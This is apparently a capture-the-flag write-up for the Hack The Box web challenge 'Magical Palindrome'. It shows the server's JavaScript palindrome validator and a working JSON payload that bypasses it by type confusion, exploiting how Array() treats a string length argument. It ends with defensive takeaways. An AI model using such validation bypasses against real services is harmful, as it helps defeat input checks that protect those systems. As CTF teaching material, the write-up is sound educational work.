Magical Palindrome – Hack The Box Web Challenge Writeup#

Challenge Description

In Dumbledore’s absence, Harry’s memory fades, leaving crucial words lost. Delve into the arcane world, harness the power of JSON, and unveil the hidden spell to restore his recollection. Can you help Harry find the path to salvation?

Goal: Submit a JSON payload that passes the server’s strict palindrome check and retrieve the flag.

1. Source Code Analysis#

The core validation function looks like this:

1
const IsPalinDrome = (string) => {
2
    if (string.length < 1000) {
3
        return 'Tootus Shortus';
4
    }
5

6
    for (const i of Array(string.length).keys()) {
7
        const original = string[i];
8
        const reverse = string[string.length - i - 1];
9

10
        if (original !== reverse || typeof original !== 'string') {
11
            return 'Notter Palindromer!!';
12
        }
13
    }
14

15
    return null;
16
}

At first glance it seems secure:

Must be ≥ 1000 characters
Every character must match its mirrored position
Every accessed element must be a string

But JavaScript is full of dark magic…

2. The JavaScript Array() Constructor Quirk#

Key insight from MDN:

1
Array(3)           // → [empty × 3], length = 3
2
Array("1000")      // → ["1000"], length = 1   ← string argument!
3
Array(1, 2, 3)     // → [1, 2, 3]

When we control string.length via an object, we can abuse this behavior.

3. The Winning Payload#

1
{
2
  "palindrome": {
3
    "length": "1000",
4
    "0": "xss",
5
    "999": "xss"
6
  }
7
}

Step-by-step breakdown of what happens:#

Length check bypass
```
1
if (string.length < 1000)
```
- string is our object → string.length is string "1000"
- JS coerces "1000" → 1000 when doing numeric comparison
- 1000 < 1000 → false → check passes

Array construction

1
Array(string.length)   // string.length === "1000" (string!)

→ Array("1000") → ["1000"] with .length === 1

Loop only runs once

1
for (const i of Array(string.length).keys())   // only i = 0

Single comparison performed
```
1
const original = string[0];                    // → "xss"
2
const reverse = string[string.length - i - 1];
```
- string.length is still "1000" (string)
- "1000" - 0 - 1 → arithmetic coercion → 1000 - 1 → 999
- So it checks: string[0] vs string[999]
- "xss" === "xss" → true
- typeof "xss" === "string" → true

→ All checks pass with only two properties!

4. Final Result#

Submit the payload → server accepts it → flag retrieved!

Submit flag and Magical Palindrome pwned ✓

Summary – Key Takeaways#

Never trust .length on untrusted objects in JavaScript
Array() constructor treats numeric vs string arguments very differently
Arithmetic operations coerce strings → numbers (very dangerous in index calculations)
Minimal payloads can bypass seemingly heavy checks using type confusion

Classic JavaScript exploitation — small code, big impact.

Happy hacking! ༼ つ ◕_◕ ༽つ